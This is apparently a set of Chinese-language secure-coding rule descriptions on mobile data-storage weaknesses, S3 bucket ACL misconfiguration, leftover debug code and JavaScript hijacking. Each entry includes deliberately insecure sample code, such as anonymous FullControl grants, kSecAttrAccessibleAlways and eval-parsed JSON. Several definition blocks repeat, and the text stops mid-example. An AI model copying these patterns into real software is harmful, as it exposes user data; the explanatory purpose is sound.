HTTP(S) 响应中可能包含敏感数据，例如会话 Cookie 和 API 标记。 出于性能方面的考虑，URL 加载系统会对所有 HTTP(S) 响应进行缓存，将它们以未加密的形式存储在不安全的共享存储中。

示例 1： 以下代码将 HTTP(S) 响应缓存安装在共享存储空间：

    protected void onCreate(Bundle savedInstanceState) {
       ...

       try {
           File httpCacheDir = new File(context.getExternalCacheDir(), "http");
           long httpCacheSize = 10 * 1024 * 1024; // 10 MiB
           HttpResponseCache.install(httpCacheDir, httpCacheSize);
       } catch (IOException e) {
           Log.i(TAG, "HTTP response cache installation failed:" + e);
       }
    }

    protected void onStop() {
       ...

       HttpResponseCache cache = HttpResponseCache.getInstalled();
       if (cache != null) {
           cache.flush();
       }
   }

HTTP(S) 响应中可能包含敏感数据，例如会话 cookie 和 API 标记。出于性能方面的考虑，URL 加载系统会对所有 HTTP(S) 请求进行缓存，并将它们以未加密的形式保存在 {app ID}/Library/Caches/com.mycompany.myapp/Cache.db* 文件中。
开发者也许认为将 URLCache 类的 diskCapacity 或 memoryCapacity 属性设置为 0，就能成功禁用 HTTP(S) 响应缓存系统。但是，NSURLCache 文档指出，只有在设备的内存或磁盘空间不足的情况下，才会将磁盘和内存缓存缩减到配置的大小。这两项设置都是系统用来释放其资源以提高性能的，而非用于安全控制。

数据保护 API 旨在让应用程序能够声明，何时应可访问文件系统中存储的密钥链和文件中的项目。它可用于大部分文件和数据库 API，包括 NSFileManager、CoreData、NSData 和 SQLite。通过为给定资源指定四个保护级别的其中之一，开发人员可以指令底层文件系统使用从设备 UID 和用户密码中派生的密钥或完全基于设备 UID 的密钥，对该给定资源进行加密（以及何时进行自动解密）。

NSFileManager 的数据保护类会定义为常量，以便在与 NSFileManager 实例相关联的 NSDictionary 中指定为 NSFileProtectionKey 键的值，并可通过使用 NSFileManager 函数（包括 setAttributes:ofItemAtPath:error:、attributesOfItemAtPath:error: 和 createFileAtPath:contents:attributes:）创建文件或修改其数据保护类。此外，NSData 对象的相应数据保护常量会定义为 NSDataWritingOptions，并可将其作为 options 参数传递到 NSData 函数 writeToURL:options:error: 和 writeToFile:options:error:。NSFileManager 和 NSData 的各种数据保护类常量定义如下：

-NSFileProtectionComplete, NSDataWritingFileProtectionComplete:
当设备被锁定或正在引导时，资源以加密格式存储在磁盘上，且无法读取或写入。
在 iOS 4.0 和更高版本中可用。
-NSFileProtectionCompleteUnlessOpen, NSDataWritingFileProtectionCompleteUnlessOpen:
资源以加密格式存储在磁盘上。当设备被锁定时可以创建资源，但一旦关闭设备，则在设备解除锁定之前将无法再打开设备。如果资源解除锁定后打开了资源，则即使用户锁定了装置，您也可以继续正常访问资源。
在 iOS 5.0 和更高版本中可用。
-NSFileProtectionCompleteUntilFirstUserAuthentication, NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication:
资源以加密格式存储在磁盘上，在设备完成引导之前将一直无法进行访问。在用户首次将设备解除锁定后，即使用户随后锁定设备，您的应用程序也可以访问该资源并且可以持续进行访问。
在 iOS 5.0 和更高版本中可用。
-NSFileProtectionNone, NSDataWritingFileProtectionNone:
此资源没有与其相关联的特殊保护。它可以随时读取或写入。
在 iOS 4.0 和更高版本中可用。

因此，用 NSFileProtectionCompleteUnlessOpen 或 NSFileProtectionCompleteUntilFirstUserAuthentication 标记一个文件，就会使用从用户密码或设备 UID 派生的密钥对其进行加密，但在某些情况下依然可以访问数据。因此，应该对 NSFileProtectionCompleteUnlessOpen 或 NSFileProtectionCompleteUntilFirstUserAuthentication 的用法进行仔细审核，以确定是否需要使用 NSFileProtectionComplete 执行进一步保护。

例 1：以下例子中，给定的文件仅在用户首次打开设备和提供密码前受保护（直到下次重新引导）：

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSDictionary *protection = [NSDictionary dictionaryWithObject:NSFileProtectionCompleteUntilFirstUserAuthentication forKey:NSFileProtectionKey];
...
[[NSFileManager defaultManager] setAttributes:protection ofItemAtPath:filepath error:nil];
...
BOOL ok = [testToWrite writeToFile:filepath atomically:YES encoding:NSUnicodeStringEncoding error:&err];
...

例 2：以下例子中，给定的数据仅在用户首次打开设备和提供密码前受保护（直到下次重新引导）：

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSData *textData = [textToWrite dataUsingEncoding:NSUnicodeStingEncoding];
...
BOOL ok = [textData writeToFile:filepath options:NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication error:&err];
...

密钥链可访问性常量旨在使应用程序能够声明何时可访问密钥链中的项目。通过为给定密钥链项目指定某一个可访问性常量，开发人员可以指示底层文件系统使用从设备 UID 和用户密码中派生的密钥或完全基于设备 UID 的密钥，对该给定项目进行加密（以及何时进行自动解密）。

密钥链可访问性常量应指定为密钥链属性字典中 kSecAttrAccessible 键的值。下面列出了各种密钥链可访问性常量的定义：

-kSecAttrAccessibleAfterFirstUnlock:
重新启动后，将无法访问密钥链项目中的数据，直到用户将设备解除锁定一次。
第一次解除锁定后，数据将保持可访问状态，直到下次重新启动。推荐将此属性用于需要由后台应用程序访问的项目。具有此属性的项目在使用加密备份时会迁移到新设备。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
重新启动后，将无法访问密钥链项目中的数据，直到用户将设备解除锁定一次。
第一次解除锁定后，数据将保持可访问状态，直到下次重新启动。推荐将此属性用于需要由后台应用程序访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleAlways:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目在使用加密备份时会迁移到新设备。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
只能在设备解除锁定时访问密钥链中的数据。仅在设备上设置了密码时可用。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。将备份恢复到新设备后，这些项目将丢失。不能在没有密码的设备上的此类中存储任何项目。禁用设备密码将会删除此类中的所有项目。
在 iOS 8.0 和更高版本中可用。

-kSecAttrAccessibleAlwaysThisDeviceOnly:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlocked:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目在使用加密备份时会迁移到新设备。
这是在没有明确设置可访问性常量的情况下添加密钥链项目时的默认值。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

因此，用 kSecAttrAccessibleAfterFirstUnlock 标记一个密钥链项目，就会使用从用户密码或设备 UID 派生的密钥对其进行加密，但在某些情况下依然可以访问数据。因此，应该对 kSecAttrAccessibleAfterFirstUnlock 的用法进行仔细审核，以确定是否需要执行进一步保护。

示例 1：在以下示例中，给定密钥链项目仅在用户首次打开设备和提供密码前受保护（直到下次重新引导）：

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure KeyChain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...
    [dict setObject:(__bridge id)kSecAttrAccessibleAfterFirstUnlock forKey:(__bridge id) kSecAttrAccessible];

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

数据保护 API 旨在让应用程序能够声明，何时应可访问文件系统中存储的密钥链和文件中的项目。它可用于大部分文件和数据库 API，包括 NSFileManager、CoreData、NSData 和 SQLite。通过为给定资源指定四个保护级别的其中之一，开发人员可以指令底层文件系统使用从设备 UID 和用户密码中派生的密钥或完全基于设备 UID 的密钥，对该给定资源进行加密（以及何时进行自动解密）。

NSFileManager 的数据保护类会定义为常量，以便在与 NSFileManager 实例相关联的 NSDictionary 中指定为 NSFileProtectionKey 键的值，并可通过使用 NSFileManager 函数（包括 setAttributes:ofItemAtPath:error:、attributesOfItemAtPath:error: 和 createFileAtPath:contents:attributes:）创建文件或修改其数据保护类。此外，NSData 对象的相应数据保护常量会定义为 NSDataWritingOptions，并可将其作为 options 参数传递到 NSData 函数 writeToURL:options:error: 和 writeToFile:options:error:。NSFileManager 和 NSData 的各种数据保护类常量定义如下：

-NSFileProtectionComplete, NSDataWritingFileProtectionComplete:
当设备被锁定或正在引导时，资源以加密格式存储在磁盘上，且无法读取或写入。
在 iOS 4.0 和更高版本中可用。
-NSFileProtectionCompleteUnlessOpen, NSDataWritingFileProtectionCompleteUnlessOpen:
资源以加密格式存储在磁盘上。当设备被锁定时可以创建资源，但一旦关闭设备，则在设备解除锁定之前将无法再打开设备。如果资源解除锁定后打开了资源，则即使用户锁定了装置，您也可以继续正常访问资源。
在 iOS 5.0 和更高版本中可用。
-NSFileProtectionCompleteUntilFirstUserAuthentication, NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication:
资源以加密格式存储在磁盘上，在设备完成引导之前将一直无法进行访问。在用户首次将设备解除锁定后，即使用户随后锁定设备，您的应用程序也可以访问该资源并且可以持续进行访问。
在 iOS 5.0 和更高版本中可用。
-NSFileProtectionNone, NSDataWritingFileProtectionNone:
此资源没有与其相关联的特殊保护。它可以随时读取或写入。
在 iOS 4.0 和更高版本中可用。

即使 iOS 设备上的所有文件（包括没有显式分配数据保护级别的文件）是以加密形式存储，也请使用完全基于设备的 UID 派生的密钥，以加密形式指定 NSFileProtectionNone 结果。这使此文件在设备打开时随时可以进行访问，包括用密码锁定或正在引导时。因此，应该对 NSFileProtectionNone 的用法进行仔细审核，以确定是否需要执行更严格的数据保护。

例 1：在以下例子中，给定文件不受保护（设备打开时可随时访问）：

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSDictionary *protection = [NSDictionary dictionaryWithObject:NSFileProtectionNone forKey:NSFileProtectionKey];
...
[[NSFileManager defaultManager] setAttributes:protection ofItemAtPath:filepath error:nil];
...
BOOL ok = [testToWrite writeToFile:filepath atomically:YES encoding:NSUnicodeStringEncoding error:&err];
...

例 2：在以下例子中，给定数据不受保护（设备打开时可随时访问）：

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSData *textData = [textToWrite dataUsingEncoding:NSUnicodeStingEncoding];
...
BOOL ok = [textData writeToFile:filepath options:NSDataWritingFileProtectionNone error:&err];
...

密钥链可访问性常量旨在使应用程序能够声明何时可访问密钥链中的项目。通过为给定密钥链项目指定某一个可访问性常量，开发人员可以指示底层文件系统使用从设备 UID 和用户密码中派生的密钥或完全基于设备 UID 的密钥，对该给定项目进行加密（以及何时进行自动解密）。

密钥链可访问性常量应指定为密钥链属性字典中 kSecAttrAccessible 键的值。下面列出了各种密钥链可访问性常量的定义：

-kSecAttrAccessibleAfterFirstUnlock:
重新启动后，将无法访问密钥链项目中的数据，直到用户将设备解除锁定一次。
第一次解除锁定后，数据将保持可访问状态，直到下次重新启动。推荐将此属性用于需要由后台应用程序访问的项目。具有此属性的项目在使用加密备份时会迁移到新设备。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
重新启动后，将无法访问密钥链项目中的数据，直到用户将设备解除锁定一次。
第一次解除锁定后，数据将保持可访问状态，直到下次重新启动。推荐将此属性用于需要由后台应用程序访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleAlways:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目在使用加密备份时会迁移到新设备。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
只能在设备解除锁定时访问密钥链中的数据。仅在设备上设置了密码时可用。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。将备份恢复到新设备后，这些项目将丢失。不能在没有密码的设备上的此类中存储任何项目。禁用设备密码将会删除此类中的所有项目。
在 iOS 8.0 和更高版本中可用。

-kSecAttrAccessibleAlwaysThisDeviceOnly:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlocked:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目在使用加密备份时会迁移到新设备。
这是在没有明确设置可访问性常量的情况下添加密钥链项目时的默认值。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

即使 iOS 设备上的所有文件（包括没有明确分配密钥链可访问性常量的文件）是以加密形式存储，也请使用完全基于设备的 UID 派生的密钥，以加密形式指定 kSecAttrAccessibleAlways 结果。这使此文件在设备打开时随时可以进行访问，包括用密码锁定或正在引导时。因此，应该对 kSecAttrAccessibleAlways 的用法进行仔细审核，以确定是否需要执行更严格的密钥链可访问性级别。

示例 1：在以下示例中，给定文件不受保护（设备打开时可随时访问）：

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure KeyChain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...
    [dict setObject:(__bridge id)kSecAttrAccessibleAlways forKey:(__bridge id) kSecAttrAccessible];

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

应用程序文件可以由根设备上或未加密备份中的其他应用程序访问。由于用户可以决定越狱其设备或执行未加密的备份，因此最好对包含敏感数据的数据库进行加密。

示例 1：以下代码建立到未加密的 Realm 数据库的连接：

    Realm realm = Realm.getDefaultInstance();

保存到 iOS 相册中的文件可随意读取，并且可供设备中的应用程序访问。攻击者可以利用这一特点盗取敏感的照片，例如，用于手机支票存款的支票图片。

例 1：下面的代码使用 UIImageWriteToSavedPhotosAlbum 将图像保存到相册：

- (void) imagePickerController:(UIImagePickerController *)picker didFinishPickingMediaWithInfo:(NSDictionary *)info
{
	// Access the uncropped image from info dictionary
	UIImage *image = [info objectForKey:UIImagePickerControllerOriginalImage];

  // Save image
  UIImageWriteToSavedPhotosAlbum(image, self, @selector(image:didFinishSavingWithError:contextInfo:), nil);

	...
}

密钥链可访问性级别定义了密钥链项目可在何时解密以供应用程序使用。可用的可访问性级别如下所示：

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
重新启动后，将无法访问密钥链项目中的数据，直到用户将设备解除锁定一次。
第一次解除锁定后，数据将保持可访问状态，直到下次重新启动。推荐将此属性用于需要由后台应用程序访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleAlways:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目在使用加密备份时会迁移到新设备。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
只能在设备解除锁定时访问密钥链中的数据。仅在设备上设置了密码时可用。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。将备份恢复到新设备后，这些项目将丢失。不能在没有密码的设备上的此类中存储任何项目。禁用设备密码将会删除此类中的所有项目。
在 iOS 8.0 和更高版本中可用。

-kSecAttrAccessibleAlwaysThisDeviceOnly:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlocked:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目在使用加密备份时会迁移到新设备。
这是在没有明确设置可访问性常量的情况下添加密钥链项目时的默认值。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

如果密钥链项目采用诸如 kSecAttrAccessibleWhenUnlocked 等较安全的策略存储，那么如果您的设备在设置了密码的情况下被盗，则盗窃者需要解锁设备才能将密钥链项目解除锁定。如果无法输入正确的密码，盗窃者便无法解密密钥链项目。但是，如果没有设置密码，则攻击者只需滑动手指即可对设备解除锁定，并获得密钥链来解密其项目。因此，如果不强制要求为设备设置密码，则可能会削弱密钥链加密机制的安全性。

示例 1：在以下示例中，除了设备处于打开或解除锁定状态时，密钥链项目始终受保护，但在设备未设置密码时密钥链项目也处于可用状态：

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure KeyChain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...
    [dict setObject:(__bridge id)kSecAttrAccessibleWhenUnlockedThisDeviceOnly forKey:(__bridge id) kSecAttrAccessible];

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

命名粘贴板使开发人员能够与应用程序的其他部分或具有相同团队 ID 的其他应用程序共享数据。将命名粘贴板配置为永久的功能已弃用，其可能会导致敏感数据泄露。当粘贴板被标记为永久时，存储在粘贴板中的数据可能会以未加密的方式保存在本地存储，且会在应用程序和设备重启时永久存在。
示例 1：在以下示例中，通过调用 setPersistent:YES 创建命名粘贴板并将其配置为永久。

  ...
  UIPasteboard *pasteboard = [UIPasteboard pasteboardWithName:@"myPasteboard" create:YES];
  [pasteboard setPersistent:YES];
  ...

授予对存储桶或对象的完全匿名访问权限将允许攻击者读取内容或将其替换为恶意内容。

示例 1：以下代码设置的Access Control Policy可授予对 foo 存储桶的完全匿名访问权限。

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("FullControl");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

授予匿名读取存储桶或对象的访问控制策略 (ACP) 的权限将允许攻击者发现可以检索或覆盖的对象。

示例 1：以下代码设置的Access Control Policy可授予对 foo 存储桶的匿名读取 ACP 访问权限。

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("READ_ACP");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

授予对存储桶或对象的匿名读取访问权限将允许攻击者读取其内容。

示例 1：以下代码设置的Access Control Policy可授予对 foo 存储桶的匿名读取访问权限。

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("Read");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

授予匿名写入存储桶或对象的访问控制策略 (ACP) 的权限将允许攻击者在该存储桶中读取或写入任意内容。

示例 1：以下代码设置的Access Control Policy可授予对 foo 存储桶的匿名写入 ACP 访问权限。

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("WRITE_ACP");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

授予对存储桶或对象的匿名写入访问权限将允许攻击者替换内容或上传恶意内容。

示例 1：以下代码设置的Access Control Policy可授予对 foo 存储桶的匿名写入访问权限。

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("Write");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

识别出的函数会将数据写入通用粘贴板，但未阻止数据通过“接力”功能在各个设备的通用剪贴板之间同步。

写入通用粘贴板的内容在设备重启、应用程序卸载和应用程序恢复期间会永久存储。在启用了通用剪贴板功能的情况下使用通用粘贴板会增加粘贴板数据被盗用或被修改的风险，这是在另一台设备上运行的恶意应用程序发起剪贴板劫持攻击的一部分。

此外，由于通用剪贴板与运行 iOS 10 及更高版本或 macOS Sierra 及更高版本的设备兼容，因此运行较旧的操作系统（不含旨在保护未经授权的剪贴板访问的最新隐私和安全更新）的兼容设备会带来更大的威胁。

示例 1：以下代码通过设置 items 属性将数据写入通用粘贴板，默认情况下，该属性允许通过通用剪贴板在用户设备之间共享粘贴板内容。

...
UIPasteboard *pasteboard = [UIPasteboard generalPasteboard];
NSDictionary *items = @{
    UTTypePlainText : sensitiveDataString,
    UTTypePNG : [UIImage imageWithData:medicalImageData]
};
[pasteboard setItems: @[items]];
...

示例 2：以下代码在通用剪贴板行为显式启用（通过将 localOnly 参数设置为 NO）的情况下通过调用 setObjects:localOnly:expirationDate: 方法将数据写入通用粘贴板。

...
UIPasteboard *pasteboard = [UIPasteboard generalPasteboard];
[pasteboard setObjects:@[sensitiveDataString, [UIImage imageWithData:medicalImageData]] 
            localOnly:NO 
            expirationDate:[NSDate distantFuture]];
...

将数据存储到密钥链中时，需要设置可访问性级别以定义可在何时访问项目。可用的可访问性级别如下所示：

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
重新启动后，将无法访问密钥链项目中的数据，直到用户将设备解除锁定一次。
第一次解除锁定后，数据将保持可访问状态，直到下次重新启动。推荐将此属性用于需要由后台应用程序访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleAlways:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目在使用加密备份时会迁移到新设备。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
只能在设备解除锁定时访问密钥链中的数据。仅在设备上设置了密码时可用。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。将备份恢复到新设备后，这些项目将丢失。不能在没有密码的设备上的此类中存储任何项目。禁用设备密码将会删除此类中的所有项目。
在 iOS 8.0 和更高版本中可用。

-kSecAttrAccessibleAlwaysThisDeviceOnly:
始终可访问密钥链项目中的数据，无论设备是否已锁定。
不建议用于应用程序。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlocked:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目在使用加密备份时会迁移到新设备。
这是在没有明确设置可访问性常量的情况下添加密钥链项目时的默认值。
在 iOS 4.0 和更高版本中可用。

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
只能在用户对设备解除锁定时访问密钥链项目中的数据。
建议只用于当应用程序处于前台时才需要访问的项目。具有此属性的项目不会迁移到新设备。因此，从不同设备的备份恢复后，这些项目将不存在。
在 iOS 4.0 和更高版本中可用。

最初引入密钥链保护时，可访问性级别的默认值为 kSecAttrAccessibleAlways，但该设置存在安全问题，因为可访问或窃取您的设备的人将能够读取密钥链的内容。当前的默认属性为 kSecAttrAccessibleWhenUnlocked，这是一个限制性较高的默认值。但是，Apple 的公开文档对于默认属性应为何值存在分歧，因此为了以防万一，应在所有密钥链项目上明确设置此属性。

示例 1：在以下示例中，存储密钥链项目时未明确指定可访问性级别，这可能导致在不同的 iOS 版本上出现不同的行为：

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure Keychain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

开发过程中一般会为了调试和测试目的增加一些“后门”代码，这些代码不会随应用程序一起提供或部署。如果这类调试代码无意中被保留在应用程序中，则会导致应用程序向计划外的交互模式开放。这些后门入口点很容易产生安全隐患，因为它们不在当初的设计或者测试的考虑之内，并且不会出现在应用程序设计中的操作环境里。

遗忘调试代码中最常见例子出现在 web 应用程序中的 main() 方法。尽管这在产品的开发过程中是完全可以接受的，但是属于 J2EE 应用程序中的那部分类不应该定义 main()。

如果发生以下情况，应用程序可能会很容易受到 JavaScript 劫持的攻击：1) 将 JavaScript 对象用作数据传输格式 2) 处理机密数据。由于 JavaScript 劫持漏洞不会作为编码错误的直接结果出现，所以 Fortify 安全编码规则包会通过识别在 HTTP 响应中产生的 JavaScript 代码，引起人们对潜在的 JavaScript 劫持漏洞的注意。

Web 浏览器执行同源策略 (Same Origin Policy)，以保护用户免受恶意网站的攻击。同源策略 (Same Origin Policy) 规定：如果要使用 JavaScript 来访问某个网页的内容的话，则 JavaScript 和网页必须都来源于相同的域。若不采取同源策略 (Same Origin Policy)，恶意网站便可以使用客户端凭证来运行从其他网站加载敏感信息的 JavaScript，并对这些信息进行提炼，然后将其返回给攻击者。通过 JavaScript 劫持，攻击者可以绕过 Web 应用程序中使用的同源策略 (Same Origin Policy)，该应用程序使用 JavaScript 来交流机密信息。同源策略 (Same Origin Policy) 中的漏洞是：通过这一策略，任何网站的 JavaScript 都可以被其他网站的上下文包含或执行。即使恶意网站不能直接在客户端上检查易受攻击的站点中加载的所有数据，但它仍可以通过配置一个特定的环境利用该漏洞。有了这样的环境，恶意网站就可以监视 JavaScript 的执行过程和任何可能发生的相关负面效应。由于许多 Web 2.0 应用程序使用 JavaScript 作为数据传输机制，因此，与传统的 Web 应用程序不同，它们往往很容易受到各种攻击。

JavaScript 中最常见的信息传输格式为 JavaScript Object Notation (JSON)。JSON RFC 将 JSON 语法定义为 JavaScript 类实例文本化定义语法 (object literal syntax)的子集。JSON 基于两种数据结构类型：阵列和对象。所有可以作为一个或多个有效 JavaScript 语句进行解析的数据传送格式都容易受到 JavaScript 劫持的攻击。JSON 使 JavaScript 劫持变得更加容易，因为 JSON 数组坚持认为它自己就是有效的 JavaScript 指令。因为数组是交换列表的一种正常形式，在应用程序需要交换多个值时会普遍使用该形式。换句话说，一个 JSON 数组会直接受到 JavaScript 劫持的攻击。一个 JSON 对象只在其被一些其他 JavaScript 结构包围时才会受到攻击，这些 JavaScript 结构坚持认为它们自己就是有效的 JavaScript 指令。

示例 1：在以下示例中，开头显示了一个在 Web 应用程序的客户端和服务器组件之间进行的合法 JSON 交互，这一 Web 应用程序用于管理潜在商机。接下来，它说明了攻击者如何模仿客户端获取服务器端返回的机密信息。注意，本例子是专为基于 Mozilla 的浏览器而编写的代码。若在创建对象时，没有使用 new 运算符，则其他主流浏览器会禁止重载默认构造函数。

客户端向服务器请求数据，并通过以下代码评估 JSON 结果：

var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
  if (req.readyState == 4) {
    var txt = req.responseText;
    object = eval("(" + txt + ")");
    req = null;
  }
};
req.send(null);

当此代码运行时，它会生成一个如下所示的 HTTP 请求：

GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

（在本 HTTP 响应和随后的响应中，我们省略了与该解释没有直接关系的 HTTP 头信息。）
服务器使用 JSON 格式的数组进行响应：

HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-8
...
